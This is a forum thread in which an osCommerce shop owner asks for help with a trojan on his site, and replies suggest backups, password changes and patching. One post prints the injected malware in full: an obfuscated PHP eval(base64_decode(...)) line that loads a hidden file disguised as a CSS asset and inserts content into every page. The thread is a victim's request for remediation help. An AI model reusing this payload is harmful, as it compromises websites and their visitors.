7 {{ upvoteCount | shortNum }}
7 {{ upvoteCount | shortNum }}

Trojan on Website (oscommerce) Help

by Aaron Elliott
5 replies
Someone has placed a Trojan on my website Kitejunkiee - Kitesurfing Sunglasses, Hook Knifes & Accessories . I am ranking very well in google page 1 for several search terms making no sales in last 2 weeks and if you type kitejunkiee in google it will show my site but the description is all messed up.

Im almost sure a competitor has done this, can anyone please give me some advice to get this fixed and or prevent this from happening again.

I host with godaddy.

Thanks in advance
#oscommerce #trojan #website
  • Profile picture of the author Chris Grable
    Aaron,

    The last thing I am going to do is visit your website if there is a trojan on it..... How do you know that your site has a Trojan on it? What trojan is it? Have you changed all of your passwords? Have you backed your site up recently and can you reinstall an older (pre-trojan) version? If you haven't backed it up.... GoDaddy probably has... will they reinstall it for you?

    They would be the first place I looked for help and support.
    {{ DiscussionBoard.errors[1216283].message }}
  • Profile picture of the author Aaron Elliott
    all my pages have this junk embedded :


    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZS9jb250ZW50L2svaS90L2tpdGVqdW5raWVlMS9odG1sL2Fk bWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy 9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNl KCcvaG9tZS9jb250ZW50L2svaS90L2tpdGVqdW5raWVlMS9odG 1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2lt YWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdG lvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdk Z29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZS cpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYw MzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwOD dBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVF OUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMT Y5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1 NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUj ZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRS MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYW NrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4 MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMT NGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZD ODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QU I0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNG QzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QT MzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4 NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MD YwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Qx QzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYw MTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcy gkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNo cigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT QxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5 N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4OD Q2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJB RkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qz c0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdC N0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMT BFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRB NUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENj VFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRS QzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW 5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYw M0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG 5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUy RTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRj AzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2kn LCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKX tyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+ KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNk M3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIz RTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3 N0YXJ0KCdkZ29iaCcpO319fQ=='));
    Signature
    {{ DiscussionBoard.errors[1216689].message }}
  • Profile picture of the author Peter Adamson
    There is a known vulnerability in oscommerce. It is often used to put up phishing pages. Be sure you don't have one. Look for unknown directories in your html root. Google oscommerce vulnerabilities and you will find some info and fixes.
    Signature
    Could You Be Squeezing More Sales Out Of Your Traffic ?
    Free Report
    {{ DiscussionBoard.errors[1216950].message }}
  • Profile picture of the author Aaron Elliott
    This thing I had is popular with wordpress too, but by the looks of it wordpress has a simple script to remove it. I had to re build the entire site!
    Signature
    {{ DiscussionBoard.errors[1244917].message }}

Trending Topics